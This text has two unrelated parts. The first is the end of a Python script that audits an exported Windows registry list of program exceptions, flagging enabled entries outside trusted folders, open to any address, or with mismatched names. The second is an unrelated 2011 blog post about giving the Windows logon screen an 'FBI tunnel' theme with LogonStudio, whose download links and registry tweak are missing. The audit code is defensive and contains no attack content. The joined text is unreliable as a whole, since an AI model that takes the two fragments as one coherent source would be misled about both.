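        if line.startswith("[") and line.endswith("]"):
            in_list = line[1:-1].lower() == LIST_KEY.lower()
            continue
        match = VALUE_RE.match(line) if in_list else None
        if match:
            name, data = unescape(match.group(1)), unescape(match.group(2))
            entries.append((name, data.rsplit(":", 3)))
    return entries


def audit(reg_text, trusted_dirs=TRUSTED_DIRS):
    """Return [(path, [reasons])] for enabled entries worth reviewing."""
    findings = []
    for name, fields in parse_entries(reg_text):
        if len(fields) != 4:
            findings.append((name, ["unparseable value data"]))
            continue
        path, scope, status, _label = fields
        if status.lower() != "enabled":
            continue
        reasons = []
        if not any(path.lower().startswith(d.lower()) for d in trusted_dirs):
            reasons.append("executable outside trusted directories")
        if scope == "*":
            reasons.append("reachable from any address")
        if name.lower() != path.lower():
            reasons.append("value name does not match path in data")
        if reasons:
            findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    for path, reasons in audit(SAMPLE_REG):
        print(path, "->", "; ".join(reasons))
```

Comparing successive exports of this key also shows entries that were added and later removed, which a single snapshot cannot.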

Friday, June 3, 2011

Make Your Computer Login Screen Like FBI Tunnel





Step 1: Download LogonStudio

LogonStudio 1.7 | 7Mb

Information:

Longing for some change in your life? Why not start with that boring old Windows XP logon screen? With the freeware LogonStudio, choosing another screen is a matter of two clicks. Alternately, you can design your own with a built-in editor.
The first option is a lot easier. About 30 cool screens are available on the WinCustomize site, and the program can randomly select one on every boot. Editing is less straightforward. You build or modify logon screens by tweaking parameters on a lengthy list of elements. So you might, for instance, change the FirstColor parameter of the Centre Panel element to a new shade of blue. This allows you to customize everything from background to letterings to buttons, but beginners will find the process quite confusing. The sketchy online help isn't much assistance, either.


Download for Windows Vista (works with Windows 7 too)


Download for Windows XP:


Step 2: Download FBI files from here:


Step 3: If you want to remove the Switch User button, you can do it with this registry tweak.